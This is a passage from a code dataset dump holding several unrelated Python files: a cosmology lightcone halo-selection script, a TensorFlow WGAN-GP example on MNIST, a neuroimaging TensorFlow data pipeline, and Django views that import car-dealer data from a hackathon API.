{5} {6}\\n'.format(\n all_ids[wm][n], all_redshift[wm][n], \n all_shell[wm][n], all_mass[wm][n], \n all_x[wm][n], all_y[wm][n], all_z[wm][n]))\n next_file.close()\n print('Done')\n sys.stdout.flush()\n \n\n# =================================================================================================\n\n\ndef vis_output_regions(maxStep, minStep, rL, corrLength, phiMax, plotZ=False, sliceZ=False, outDir=None):\n\n '''\n Function to visualize the spatial distribution of the output of list_halos()\n given the same input parameters. In a 2d projection, a plot will be rendered\n which shows the rejected halo populations at the replicated box boundaries, \n and within an angular limit with respect to the octant edge\n\n Params:\n :param maxStep: The maximum simulation snapshot step to include\n :param minStep: The minimum simulation snapshot step to include\n :param rL: The length of the box underlying the input lightcone in Mpc/h\n :param corrLength: The length scale within which to consider correlated \n with a halo, in Mpc/h-- halos within this length of a replicated box\n boundary will experience correlation breaks in the density field\n and will be rejected\n :param phiMax: the maximum angular scale that one may want to use on subsequent\n halo lightcone cutouts given the halos output by list_halos(), \n in arcseconds\n :param plotZ: whether or not to solve the problem in 3d including the z-axis \n If False, a 2d plot is given which isn't exactly a projection \n (does not correspond to the x-y plane at any particular z-position), \n but rather demonstates the 2 dimensional anlog of the problem\n :param sliceZ: if plotZ is True, then this argument controls the plotting type. If\n False, then a 3d plot is displayed. If True, then 15 projected z-slices\n are shown\n :param outDir: Where to save plots if plotZ = sliceZ = True\n :return: None\n '''\n\n from astropy.cosmology import WMAP7 as cosmo\n from mpl_toolkits.mplot3d import Axes3D\n import matplotlib.pyplot as plt\n from matplotlib import rc\n\n a = np.linspace(1/201, 1, 500)\n z = 1/a-1\n zRange = z[np.array([minStep, maxStep])]\n LRange = cosmo.comoving_distance(zRange).value * cosmo.h\n \n x = np.random.rand(50000)*LRange[0]\n y = np.random.rand(50000)*LRange[0]\n z = np.random.rand(50000)*LRange[0]\n if(plotZ): r = np.sqrt(x**2 + y**2 + z**2)\n else: r = np.sqrt(x**2 + y**2)\n \n lc_mask = r < LRange[0]\n x = x[lc_mask]\n y = y[lc_mask]\n z = z[lc_mask]\n r = r[lc_mask]\n \n phiMax = phiMax / 60 * np.pi/180.0\n phi = np.arctan(y/x)\n if(plotZ):\n theta = np.arccos(z/r)\n thetaMax = phiMax\n maxRep = max([np.max((x/rL).astype(int))+1, np.max((y/rL).astype(int))+1, np.max((z/rL).astype(int))+1])\n\n # find all points which lie within the correlation length of any replication boundary\n # and also any points which have an angualr separation from the octant edge less than phiMax\n xm = np.abs((np.round(x/rL)*rL) - x) > corrLength\n ym = np.abs((np.round(y/rL)*rL) - y) > corrLength\n zm = np.abs((np.round(z/rL)*rL) - z) > corrLength\n if(plotZ): \n pm = np.logical_and(np.logical_and(xm, ym), zm)\n tm = ttm = np.logical_and(\n np.logical_and(theta > thetaMax/2, theta < ((np.pi/2-thetaMax/2))), \n np.logical_and(phi > phiMax/2, phi < ((np.pi/2-phiMax/2)))) \n else: \n pm = np.logical_and(xm, ym)\n tm = np.logical_and(phi > phiMax/2, phi < ((np.pi/2-phiMax/2))) \n mm = np.logical_and(pm, tm)\n\n\n rc('text', usetex=True)\n\n # 3d plot\n if(plotZ and not sliceZ):\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n 
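# 3D scatter: halos kept by the cuts in cyan, rejected halos in red\n        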
ax.plot(x[mm], y[mm], z[mm], '.c', lw=0, ms=2)\n        ax.plot(x[~mm], y[~mm], z[~mm], '.r', lw=0, ms=2)\n        ax.set_zlabel(r'$z\\>[Mpc/h]$', fontsize=16)\n    \n    # 2d slices in z\n    elif(plotZ and sliceZ):\n        zOrd = np.argsort(z)\n        xsl = np.array_split(x[zOrd], 15)\n        ysl = np.array_split(y[zOrd], 15)\n        zsl = np.array_split(z[zOrd], 15)\n        mmsl = np.array_split(mm[zOrd], 15)\n        for i in range(15):\n            fig = plt.figure()\n            ax = fig.add_subplot(111)\n            ax.plot(xsl[i][mmsl[i]], ysl[i][mmsl[i]], '.c', lw=0, ms=2)\n            ax.plot(xsl[i][~mmsl[i]], ysl[i][~mmsl[i]], '.r', lw=0, ms=2)\n            ax.set_xlabel(r'$x\\>[Mpc/h]$', fontsize=16)\n            ax.set_ylabel(r'$y\\>[Mpc/h]$', fontsize=16)\n            ax.set_title(r\"Valid Cutout Regions\" \"\\n\" r\"$\\phi_\\mathrm{max}=1000\\mathrm{arcsec},\\>l_\\xi=L/10$\")\n            # plot box replication edges\n            for j in range(maxRep):\n                ax.plot([j*rL, (j+1)*rL], [j*rL, j*rL], lw=2, color='k')\n                ax.plot([j*rL, (j+1)*rL], [(j+1)*rL, (j+1)*rL], lw=2, color='k')\n                ax.plot([j*rL, j*rL], [j*rL, (j+1)*rL], lw=2, color='k')\n                ax.plot([(j+1)*rL, (j+1)*rL], [j*rL, (j+1)*rL], lw=2, color='k')\n            ax.set_xlim([np.min(x), np.max(x)])\n            ax.set_ylim([np.min(y), np.max(y)])\n            plt.savefig('{}/{}.png'.format(outDir, i))\n            plt.show()\n        return\n    \n    # 2d problem ignoring z\n    else:\n        fig = plt.figure()\n        ax = fig.add_subplot(111)\n        ax.plot(x[mm], y[mm], '.c', lw=0, ms=2)\n        ax.plot(x[~mm], y[~mm], '.r', lw=0, ms=1) \n        # plot box replication edges; compute maxRep here since the plotZ branch above was skipped\n        maxRep = max([np.max((x/rL).astype(int))+1, np.max((y/rL).astype(int))+1])\n        for j in range(maxRep):\n            ax.plot([j*rL, (j+1)*rL], [j*rL, j*rL], lw=2, color='k')\n            ax.plot([j*rL, (j+1)*rL], [(j+1)*rL, (j+1)*rL], lw=2, color='k')\n            ax.plot([j*rL, j*rL], [j*rL, (j+1)*rL], lw=2, color='k')\n            ax.plot([(j+1)*rL, (j+1)*rL], [j*rL, (j+1)*rL], lw=2, color='k')\n        ax.set_xlim([np.min(x), np.max(x)])\n        ax.set_ylim([np.min(y), np.max(y)])\n    \n    ax.set_xlabel(r'$x\\>[Mpc/h]$', fontsize=16)\n    ax.set_ylabel(r'$y\\>[Mpc/h]$', fontsize=16)\n    ax.set_title(r\"Valid Cutout Regions\" \"\\n\" r\"$\\phi_\\mathrm{{max}}=1000\\>\\mathrm{{arcsec}},\\>l_\\xi={}\\>\\mathrm{{Mpc/h}}$\".format(corrLength))\n    plt.show()\n\n\n# =================================================================================================\n\n\ndef list_alphaQ_halos(maxStep=499, minStep=247, minMass=10**13.5, maxMass=1e18, outFrac=0.01, numFiles=1):\n    \n    '''\n    This function runs list_halos with data paths predefined for AlphaQ.\n    Function parameters are as given in the docstrings above for list_halos\n    '''\n\n    list_halos(lcDir='/projects/DarkUniverse_esp/jphollowed/alphaQ/lightcone_halos',\n               outDir='/home/hollowed/cutout_run_dirs/alphaQ/cutout_alphaQ_full',\n               massDef = 'sod', rL = 256, corrLength=150, phiMax=1000, \n               maxStep=maxStep, minStep=minStep, minMass=minMass, maxMass=maxMass, \n               outFrac=outFrac, numFiles=numFiles)\n\n\ndef list_outerRim_halos(maxStep=499, minStep=121, minMass=10**13.5, maxMass=1e18, outFrac=0.01, numFiles=1):\n    \n    '''\n    This function runs list_halos with data paths predefined for OuterRim.\n    Function parameters are as given in the docstrings above for list_halos\n    '''\n\n    list_halos(lcDir='/projects/DarkUniverse_esp/jphollowed/outerRim/lightcone_halos_octant_matchup_sod',\n               outDir='/home/hollowed/cutout_run_dirs/outerRim/cutout_outerRim_full',\n               massDef = 'sod', rL=3000, corrLength=150, phiMax=1000, \n               maxStep=maxStep, minStep=minStep, minMass=minMass, maxMass=maxMass, \n               outFrac=outFrac, numFiles=numFiles)\n\nif __name__ == \"__main__\":\n    minMass = 10**float(sys.argv[1])\n    maxMass = 10**float(sys.argv[2])\n    outFrac = float(sys.argv[3])\n    numFiles = 
int(sys.argv[4])\n    maxStep = int(sys.argv[5])\n    minStep = int(sys.argv[6])\n    list_outerRim_halos(maxStep=maxStep, minStep=minStep, minMass=minMass, maxMass=maxMass, outFrac=outFrac, numFiles=numFiles)\n","sub_path":"lightcone/list_lc_halos.py","file_name":"list_lc_halos.py","file_ext":"py","file_size_in_byte":24615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"160617301","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport os\nimport numpy as np\nfrom scipy import misc,ndimage\n\nmnist = input_data.read_data_sets('./MNIST_data')\n\nbatch_size = 100\nwidth,height = 28,28\nmnist_dim = width*height\nrandom_dim = 10\nepochs = 1000000\n\ndef my_init(size):\n    return tf.random_uniform(size, -0.05, 0.05)\n\n# Define the discriminator: three Dense layers with relu activations\nD_W1 = tf.Variable(my_init([mnist_dim, 128]))\nD_b1 = tf.Variable(tf.zeros([128]))\nD_W2 = tf.Variable(my_init([128, 32]))\nD_b2 = tf.Variable(tf.zeros([32]))\nD_W3 = tf.Variable(my_init([32, 1]))\nD_b3 = tf.Variable(tf.zeros([1]))\nD_variables = [D_W1, D_b1, D_W2, D_b2, D_W3, D_b3]\n\n# Define the generator: three Dense layers with relu activations\n# Here the generator and discriminator are required to have comparable network complexity ->\n# does that mean parameter count, or identical structure and parameters?\nG_W1 = tf.Variable(my_init([random_dim, 32]))\nG_b1 = tf.Variable(tf.zeros([32]))\nG_W2 = tf.Variable(my_init([32, 128]))\nG_b2 = tf.Variable(tf.zeros([128]))\nG_W3 = tf.Variable(my_init([128, mnist_dim]))\nG_b3 = tf.Variable(tf.zeros([mnist_dim]))\nG_variables = [G_W1, G_b1, G_W2, G_b2, G_W3, G_b3]\n\n# The discriminator outputs its score directly (no final activation)\ndef D(X):\n    X = tf.nn.relu(tf.matmul(X, D_W1) + D_b1)\n    X = tf.nn.relu(tf.matmul(X, D_W2) + D_b2)\n    X = tf.matmul(X, D_W3) + D_b3\n    return X\n\n# The generator ends with a sigmoid so its outputs are constrained to (0,1)\ndef G(X):\n    X = tf.nn.relu(tf.matmul(X, G_W1) + G_b1)\n    X = tf.nn.relu(tf.matmul(X, G_W2) + G_b2)\n    X = tf.nn.sigmoid(tf.matmul(X, G_W3) + G_b3)\n    return X\n\n# Placeholders for the real data and for the generator's random input\nreal_X = tf.placeholder(tf.float32, shape=[batch_size, mnist_dim])\nrandom_X = tf.placeholder(tf.float32, shape=[batch_size, random_dim])\nrandom_Y = G(random_X)\n\n# eps is the random interpolation coefficient, building a distribution between Y and Z,\n# where Y is the generated distribution and Z is the real distribution\neps = tf.random_uniform([batch_size, 1], minval=0., maxval=1.)\n# Interpolate\nX_inter = eps*real_X + (1. - eps)*random_Y\n# Use tf to compute the discriminator's gradient with respect to the interpolates\ngrad = tf.gradients(D(X_inter), [X_inter])[0]\n# Normalize the gradient: square it, sum per row, then take the square root\ngrad_norm = tf.sqrt(tf.reduce_sum((grad)**2, axis=1))\n# The penalty is relu(grad_norm - 1), averaged; this is not exactly the form in the paper,\n# though essentially similar. The factor of 10 is the gradient-penalty coefficient.\ngrad_pen = 10 * tf.reduce_mean(tf.nn.relu(grad_norm - 1.))\n\n# Discriminator loss: the mean over real samples (equivalent to summing), minus the mean over the generated Y, plus the penalty term\nD_loss = tf.reduce_mean(D(real_X)) - tf.reduce_mean(D(random_Y)) + grad_pen\n# Generator loss: the mean of D over the generated Y; both losses are computed from the discriminator's viewpoint, i.e. through D()\nG_loss = tf.reduce_mean(D(random_Y))\n\n# Define the optimizers, using Adam\nD_solver = tf.train.AdamOptimizer(1e-4, 0.5).minimize(D_loss, var_list=D_variables)\nG_solver = tf.train.AdamOptimizer(1e-4, 0.5).minimize(G_loss, var_list=G_variables)\n\n# Standard tf session\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\nif not os.path.exists('out/'):\n    os.makedirs('out/')\n\n# Train for `epochs` (1,000,000) iterations -- that many?\nfor e in range(epochs):\n    for i in range(5):\n        real_batch_X,_ = mnist.train.next_batch(batch_size)\n        # The noise source draws uniform(-1,1) values per batch, with dimension random_dim\n        random_batch_X = np.random.uniform(-1, 1, (batch_size, random_dim))\n        # Run the discriminator optimizer 5 times, fed with real data and noise\n        _,D_loss_ = sess.run([D_solver,D_loss], feed_dict={real_X:real_batch_X, random_X:random_batch_X})\n    # \n    random_batch_X = np.random.uniform(-1, 1, (batch_size, random_dim))\n    # After the 5 discriminator updates, run 1 generator update, fed with noise\n    _,G_loss_ = sess.run([G_solver,G_loss], feed_dict={random_X:random_batch_X})\n    if e % 1000 == 0:\n        # Every 1000 iterations, print both losses\n        print('epoch %s, D_loss: %s, G_loss: %s'%(e, D_loss_, G_loss_))\n        # \n        n_rows = 6\n        # Plot the generated samples Y, first reshaping them into 28*28 matrices\n        check_imgs = sess.run(random_Y, feed_dict={random_X:random_batch_X}).reshape((batch_size, width, height))[:n_rows*n_rows]\n        # \n        imgs = np.ones((width*n_rows+5*n_rows+5, height*n_rows+5*n_rows+5))\n        # Tile the samples into an n_rows x n_rows grid (integer division keeps the slice indices ints under Python 3)\n        for i in range(n_rows*n_rows):\n            imgs[5+5*(i%n_rows)+width*(i%n_rows):5+5*(i%n_rows)+width+width*(i%n_rows), 5+5*(i//n_rows)+height*(i//n_rows):5+5*(i//n_rows)+height+height*(i//n_rows)] = check_imgs[i]\n        misc.imsave('out/%s.png'%(e//1000), imgs)\n","sub_path":"reference_models/mnist_gangp.py","file_name":"mnist_gangp.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"29184617","text":"import matplotlib as mpl\r\nfrom glob import glob\r\nimport tensorflow as tf\r\nimport os\r\nimport nibabel as nb\r\nimport numpy as np\r\nfrom nilearn import image\r\nfrom nilearn.plotting import plot_glass_brain\r\nfrom skimage.feature import peak_local_max\r\nimport random\r\nimport io\r\nimport scipy.ndimage\r\n\r\ndef _get_resize_arg(target_shape):\r\n    mni_shape_mm = np.array([148.0, 184.0, 156.0])\r\n    target_resolution_mm = np.ceil(\r\n        mni_shape_mm / np.array(target_shape)).astype(\r\n        np.int32)\r\n    target_affine = np.array([[4., 0., 0., -75.],\r\n                              [0., 4., 0., -105.],\r\n                              [0., 0., 4., -70.],\r\n                              [0., 0., 0., 1.]])\r\n    target_affine[0, 0] = target_resolution_mm[0]\r\n    target_affine[1, 1] = target_resolution_mm[1]\r\n    target_affine[2, 2] = target_resolution_mm[2]\r\n    return target_affine, list(target_shape)\r\n\r\n\r\ndef _get_data(nthreads, batch_size, src_folder, n_epochs, cache, shuffle,\r\n              target_shape, add_nagatives, smoothness_levels, cluster_forming_thrs):\r\n    paths_ds = tf.data.Dataset.list_files(os.path.join(src_folder, \"*.nii.gz\"),\r\n                                          shuffle=shuffle)\r\n\r\n    def read_and_augument(path, target_shape):\r\n\r\n        paths_ds = tf.data.Dataset.from_tensors((path,))\r\n\r\n        target_affine, target_shape = _get_resize_arg(target_shape)\r\n\r\n        def 
_read_and_resample(path, target_affine, target_shape):\r\n path_str = path.decode('utf-8')\r\n filename = path_str.split(os.sep)[-1]\r\n nii = nb.load(path_str)\r\n data = nii.get_data()\r\n data[np.isnan(data)] = 0\r\n m = np.max(np.abs(data))\r\n data = data / m\r\n nii = nb.Nifti1Image(data, nii.affine)\r\n nii = image.resample_img(nii,\r\n target_affine=target_affine,\r\n target_shape=target_shape)\r\n data = nii.get_data().astype(np.float32)\r\n return data, filename\r\n\r\n data_ds = paths_ds.map(\r\n lambda path: tuple(tf.py_func(_read_and_resample,\r\n [path, target_affine,\r\n target_shape],\r\n [tf.float32, tf.string],\r\n name=\"read_and_resample\"),\r\n ),\r\n num_parallel_calls=2)\r\n\r\n def _smooth(data, filename, target_affine, smoothness_level):\r\n nii = nb.Nifti1Image(data, target_affine)\r\n nii = image.smooth_img(nii, smoothness_level) # !!!!!!\r\n data = nii.get_data()\r\n m = np.max(np.abs(data))\r\n data = data / m\r\n data = data.astype(np.float32)\r\n return data, filename\r\n\r\n smoothed_ds = None\r\n for smoothness_level in smoothness_levels:\r\n if smoothness_level:\r\n tmp_smooth_ds = data_ds.map(\r\n lambda data, filename: tuple(tf.py_func(_smooth,\r\n [data, filename,\r\n target_affine,\r\n tf.constant(smoothness_level)],\r\n [np.float32, tf.string],\r\n name=\"smooth\")),\r\n num_parallel_calls=2)\r\n else:\r\n tmp_smooth_ds = data_ds\r\n\r\n if smoothed_ds is None:\r\n smoothed_ds = tmp_smooth_ds\r\n else:\r\n print(\"concatenate\")\r\n smoothed_ds = smoothed_ds.concatenate(tmp_smooth_ds)\r\n\r\n def _resize_with_filename(data, filename):\r\n reshaped = tf.reshape(data, target_shape)\r\n return reshaped, filename\r\n\r\n resized_ds = smoothed_ds.map(lambda data, filename: _resize_with_filename(data, filename),\r\n num_parallel_calls=2)\r\n\r\n if add_nagatives:\r\n print(\"adding negatives\")\r\n negatives = resized_ds.map(lambda data, filename: (tf.scalar_mul(-1, data), filename),\r\n num_parallel_calls=2)\r\n resized_ds = resized_ds.concatenate(negatives)\r\n\r\n def _extract_peaks(data, cluster_forming_thr):\r\n new = np.zeros_like(data)\r\n new[data > cluster_forming_thr] = 1\r\n labels, n_features = scipy.ndimage.label(new)\r\n for j in range(1, n_features+1):\r\n if (labels == j).sum() < 5:\r\n labels[labels == j] = 0\r\n peaks = peak_local_max(data, indices=False, min_distance=1,\r\n num_peaks_per_label=45,\r\n labels=labels,\r\n threshold_abs=cluster_forming_thr).astype(np.float32)\r\n peaks[peaks > 0] = 1.0\r\n return peaks\r\n\r\n peaks_ds = None\r\n for cluster_forming_thr in cluster_forming_thrs:\r\n\r\n tmp_peaks_ds = resized_ds.map(\r\n lambda data, _: tuple(tf.py_func(_extract_peaks,\r\n [data,\r\n tf.constant(cluster_forming_thr)],\r\n [tf.float32])),\r\n num_parallel_calls=2)\r\n if peaks_ds is None:\r\n peaks_ds = tmp_peaks_ds\r\n resized_ds = resized_ds\r\n paths_ds = paths_ds\r\n else:\r\n peaks_ds = peaks_ds.concatenate(tmp_peaks_ds)\r\n resized_ds = resized_ds.concatenate(resized_ds)\r\n paths_ds = paths_ds.concatenate(paths_ds)\r\n\r\n def _resize(data):\r\n reshaped = tf.reshape(data, target_shape)\r\n return reshaped\r\n\r\n peaks_ds = peaks_ds.map(_resize)\r\n\r\n dataset = tf.data.Dataset.zip((peaks_ds, resized_ds))\r\n\r\n def _filter_empty(peaks, _):\r\n return tf.reduce_sum(peaks) > 0\r\n return dataset.filter(_filter_empty)\r\n\r\n dataset = paths_ds.apply(\r\n tf.contrib.data.parallel_interleave(\r\n lambda path: read_and_augument(path, target_shape),\r\n cycle_length=4))\r\n if cache:\r\n dataset = 
dataset.cache(cache)\r\n\r\n if shuffle:\r\n dataset = dataset.apply(tf.contrib.data.shuffle_and_repeat(1000, n_epochs))\r\n else:\r\n dataset = dataset.prefetch(1000)\r\n dataset = dataset.repeat(n_epochs)\r\n\r\n dataset = dataset.batch(batch_size)\r\n\r\n return dataset, target_shape\r\n\r\n\r\nclass Peaks2MapsDataset:\r\n\r\n def __init__(self, target_shape, train_batch_size,\r\n validation_batch_size, n_epochs, nthreads=None):\r\n self.target_shape = target_shape\r\n self.train_batch_size = train_batch_size\r\n self.validation_batch_size = validation_batch_size\r\n self.n_epochs = n_epochs\r\n if nthreads is None:\r\n import multiprocessing\r\n self.nthreads = multiprocessing.cpu_count()\r\n else:\r\n self.nthreads = nthreads\r\n\r\n def train_input_fn(self):\r\n self.training_dataset, self.target_shape = _get_data(8,\r\n self.train_batch_size,\r\n \"D:/data/neurovault/neurovault/vetted/train\",\r\n self.n_epochs,\r\n 'D:/drive/workspace/peaks2maps/cache_train_new_thr',\r\n True,\r\n self.target_shape,\r\n True,\r\n smoothness_levels=[0],\r\n cluster_forming_thrs=[0.6])\r\n\r\n # You can use feedable iterators with a variety of different kinds of iterator\r\n # (such as one-shot and initializable iterators).\r\n self.training_iterator = self.training_dataset.make_one_shot_iterator()\r\n return self.training_iterator.get_next()\r\n\r\n def eval_input_fn(self):\r\n self.validation_dataset, validation_shape = _get_data(8,\r\n self.validation_batch_size,\r\n \"G:/My Drive/data/neurovault/neurovault/vetted/eval\", #!!!\r\n #\"D:/data/hcp_statmaps/val_all_tasks\",\r\n 1,\r\n False,\r\n False,\r\n self.target_shape,\r\n False,\r\n smoothness_levels=[8],\r\n cluster_forming_thrs=[0.6])\r\n\r\n self.validation_iterator = self.validation_dataset.make_one_shot_iterator()\r\n return self.validation_iterator.get_next()\r\n\r\n\r\ndef get_plot_op(image, target_shape, summary_label):\r\n mpl.use('agg')\r\n target_affine, _ = _get_resize_arg(target_shape)\r\n target_affine_tf = tf.constant(target_affine)\r\n\r\n def _gen_plot(data, target_affine):\r\n if len(data.shape) == 4:\r\n data = data[0, :, :, :]\r\n args = {\"colorbar\": True,\r\n \"plot_abs\": False,\r\n \"threshold\": 0,\r\n \"cmap\": \"RdBu_r\",\r\n }\r\n nii = nb.Nifti1Image(np.squeeze(data), target_affine)\r\n buf = io.BytesIO()\r\n p = plot_glass_brain(nii, black_bg=False,\r\n display_mode='lyrz',\r\n vmin=-1,\r\n vmax=1,\r\n **args)\r\n p.savefig(buf)\r\n p.close()\r\n buf.seek(0)\r\n val = buf.getvalue()\r\n return val\r\n\r\n plot = tf.py_func(_gen_plot, [image, target_affine_tf], tf.string)\r\n image = tf.image.decode_png(plot)\r\n # Add the batch dimension\r\n image = tf.expand_dims(image, 0)\r\n summary_image = tf.summary.image(summary_label,\r\n image, max_outputs=10)\r\n return summary_image\r\n\r\n\r\ndef save_nii(data, target_shape, path):\r\n target_affine, _ = _get_resize_arg(target_shape)\r\n\r\n nii = nb.Nifti1Image(np.squeeze(data), target_affine)\r\n nii.to_filename(path)","sub_path":"peaks2maps/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":10890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"322263496","text":"from django.http import HttpResponse, JsonResponse\nimport cars.controller as controller\nfrom cars.helpers import getCarDemand, getColorFromDemand\n\nfrom django.shortcuts import render\n\nimport requests\nimport json\nfrom .models import Organization, CarInventory,Lead,OrganizationUnitInventory\n\n\n\n\ndef index(request):\n 
return HttpResponse(\"Hello, world. You're at the polls index.\")\n\n\ndef car_view(request):\n dealerId = 2\n\n carsByDemand = controller.getCarByDemand(dealerId)\n #dealerName = controller.getDealerName(dealerId)\n dealerName = \"Best Dealer\"\n\n potentials = controller.getPotential(dealerId)\n\n toPartCars = []\n potentialCars = []\n\n print(1)\n\n for car in carsByDemand:\n price = controller.getPrice(car[0], car[1], car[4])\n demand = 3\n toPartCars.append({\n \"inventory_make\" : car[0],\n \"inventory_model\" : car[1],\n \"inventory_frame_style\": car[2],\n \"transmission_type\": car[3],\n \"price\" : price,\n \"sell_rating\": demand,\n \"car_year\": car[4],\n \"photo_url\": controller.getCarImage(car[0], car[1], car[4]),\n \"left\" : True,\n \"color\": getColorFromDemand(demand),\n \"dealer_id\": dealerName,\n \"nVehicles\": 10 #controller.countCar(car[0], car[1], car[4], dealerId)\n })\n\n\n print(2)\n\n for car in potentials:\n price = controller.getPrice(car[0], car[1], car[4])\n #price = 0\n demand = 3\n potentialCars.append({\n \"inventory_make\" : car[0],\n \"inventory_model\" : car[1],\n \"inventory_frame_style\": car[2],\n \"transmission_type\": car[3],\n \"price\" : price,\n \"sell_rating\": demand,\n \"car_year\": car[4],\n \"photo_url\": controller.getCarImage(car[0], car[1], car[4]),\n \"left\" : False ,\n \"color\": getColorFromDemand(demand),\n \"dealer_id\": dealerName,\n \"nVehicles\": 10\n })\n\n\n print(3)\n\n return render(request, 'main_page.html', {'mycars': toPartCars,\n 'othercars': potentialCars,\n \"leftTitle\": \"Mes voitures\",\n \"rightTitle\": \"Voitures \"\n \"potentielles\",\n })\n\n\ndef exchange_view(request):\n offer_2 =2.5\n n_car = 2\n demand = getCarDemand(offer_2, n_car)\n car_data = {\n \"price\": 100.,\n \"inventory_make\": \"Ford toyota\",\n \"inventory_model\": \"RX\",\n \"inventory_frame_style\": \"sedan\",\n \"transmission_type\" : \"AUTOMATIC\",\n \"car_year\": 1992,\n \"photo_url\": \"http://img.sm360.ca/images/var/images/bdc-hackathon-2019/used_car.jpg\",\n \"sell_rating\": int( demand*100),\n \"date_entry\": \"2012-06-02\",\n \"options\": \"Sick rims\",\n \"left\": True,\n \"color\": getColorFromDemand(demand),\n \"nVehicles\": 10,\n }\n mycars = [car_data, car_data]\n othercars = [car_data, car_data]\n for car in othercars:\n car[\"left\"] = False\n exchange_data = {\n \"1\": {\n \"difference\": 1000,\n \"left_units\": 5,\n \"right_units\": 6,\n \"transport_cost\": 300,\n \"mycars\": mycars,\n \"othercars\": othercars,\n },\n\n \"2\": {\n \"difference\": 2,\n \"left_units\": 2,\n \"right_units\": 3,\n \"transport_cost\": 300,\n \"mycars\": mycars,\n \"othercars\": [*othercars, *othercars],\n }\n\n }\n\n return render(request, 'exchange_page.html', {\n \"exchange_data\": exchange_data,\n \"leftTitle\": \"Mes voitures\",\n \"rightTitle\": \"Voitures \"\n \"potentielles\",\n })\n\n\ndef test(request):\n return JsonResponse(controller.getHighestNbLead(3), safe=False)\n\ndef loadData(request):\n loadLeads()\n return HttpResponse(\"Loading data done!\")\n\ndef loadOrgUnitInventory(request):\n apiUrl = 'https://hackathon-api.bdc.n360.io/organization_unit_inventory'\n data = requests.get(apiUrl)\n\n nbPage = data.json()['Infos']['last_page']\n\n invUnits = data.json()['Items']\n\n for unit in invUnits:\n loadUnit(unit)\n\n print(\"Finished loading inventory for page 1\")\n\n for i in range(2, nbPage):\n data = requests.get(apiUrl + \"?page=\" + str(i))\n\n invUnits = data.json()['Items']\n\n for unit in invUnits:\n loadUnit(unit)\n\n 
print(\"Finished loading inv units for page \" + str(i))\n\n return HttpResponse(\"Loading data done!\")\n\n\ndef loadUnit(invUnit):\n\n #print(\"loading car id \" + str(invUnit['inventory_id']))\n org = Organization.objects.get(organization_unit_id=invUnit['organization_unit_id'])\n inv = CarInventory.objects.filter(inventory_id=invUnit['inventory_id']).first()\n #print(org)\n newInvUnit = OrganizationUnitInventory.create(inventory_id=inv, organization_unit=org)\n newInvUnit.save()\n\n return\n\n\ndef loadLeads(request):\n apiUrl = 'https://hackathon-api.bdc.n360.io/lead'\n data = requests.get(apiUrl)\n\n nbPage = data.json()['Infos']['last_page']\n\n leads = data.json()['Items']\n\n for lead in leads:\n loadOneLead(lead)\n\n print(\"Finished loading inventory for page 1\")\n\n for i in range(2, nbPage):\n data = requests.get(apiUrl + \"?page=\" + str(i))\n\n leads = data.json()['Items']\n\n for lead in leads:\n loadOneLead(lead)\n\n print(\"Finished loading leads for page \" + str(i))\n\n return HttpResponse(\"Loading data done!\")\n\n\ndef loadOneLead(lead):\n #print(lead)\n #print(\"----- Org id:\" + str(lead['organization_unit_id']))\n\n #try:\n org = Organization.objects.get(organization_unit_id=lead['organization_unit_id'])\n #print(org)\n newLead = Lead.create(lead_id=lead['lead_id'], organization_unit_id=org, lead_type_id=lead['lead_type_id'], lead_type=lead['lead_type'], employee_id=lead['employee_id'],\n lead_status_id=lead['lead_status_id'], lead_status=lead['lead_status'], lead_car_info_id=lead['lead_car_info_id'], lead_source_type_id=lead['lead_source_type_id'], lead_source=lead['lead_source'],\n lead_active=lead['lead_active'],\n date_created=lead['date_created'], date_last_modified=lead['date_last_modified'])\n newLead.save()\n #print(\"****** Added new lead ************ \")\n #except:\n # print(\"Failed getting org id: \" + str(lead['organization_unit_id']))\n return\n\n\ndef loadInventory(resource):\n apiUrl = 'https://hackathon-api.bdc.n360.io/car_inventory'\n data = requests.get(apiUrl)\n\n nbPage = data.json()['Infos']['last_page']\n\n inventory = data.json()['Items']\n\n for car in inventory:\n loadInventoryCar(car)\n\n print(\"Finished loading inventory for page 1\")\n\n for i in range(2, nbPage):\n data = requests.get(apiUrl + \"?page=\" + str(i))\n\n inventory = data.json()['Items']\n\n for car in inventory:\n loadInventoryCar(car)\n\n print(\"Finished loading inventory for page \" + str(i))\n return HttpResponse(\"Loading data done!\")\n\n\ndef loadInventoryCar(car):\n newCar = CarInventory.create(car_id=car['car_id'], inventory_id=car['inventory_id'], inventory_make_id=car['inventory_make_id'],\n inventory_make=car['inventory_make'],\n inventory_model_desc_id=car['inventory_model_desc_id'],\n inventory_model=car['inventory_model'], inventory_trim_id=car['inventory_trim_id'], inventory_trim=car['inventory_trim'],\n car_status_id=car['car_status_id'], car_status=car['car_status'],\n inventory_vehicle_category_id=car['inventory_vehicle_category_id'],car_year=car['car_year'], odometer=car['odometer'],\n note=car['note'], option=car['option'], extra_option=car['extra_option'], date_entry=car['date_entry'],\n date_updated=car['date_updated'], date_service=car['date_service'], date_sold=car['date_sold'], inventory_color=car['inventory_color'],\n inventory_interior_color=car['inventory_interior_color'],\n price=car['price'], engine_type=car['engine_type'], drive_train=car['drive_train'], transmission_gear=car['transmission_gear'],\n fuel=car['fuel'], 
induction=car['induction'],\n cubic_capacity=car['cubic_capacity'], passengers=car['passengers'],\n doors=car['doors'], new=car['new'], demo=car['demo'], certified=car['certified'], clearance=car['clearance'], carproof=car['carproof'],\n transmission_type=car['transmission_type'], commercial=car['commercial'], vehicle_page_views=car['vehicle_page_views'],\n date_created=car['date_created'])\n newCar.save()\n return\n\ndef loadOrgs(request):\n apiUrl = 'https://hackathon-api.bdc.n360.io/organization_unit'\n data = requests.get(apiUrl)\n\n nbPage = data.json()['Infos']['last_page']\n\n organizations = data.json()['Items']\n\n for org in organizations:\n loadOrgIntoDB(org)\n\n print(\"Finished loading orgs for page 1\")\n\n for i in range(2, nbPage):\n data = requests.get(apiUrl + \"?page=\" + str(i))\n\n organizations = data.json()['Items']\n\n for org in organizations:\n loadOrgIntoDB(org)\n\n print(\"Finished loading orgs for page \" + 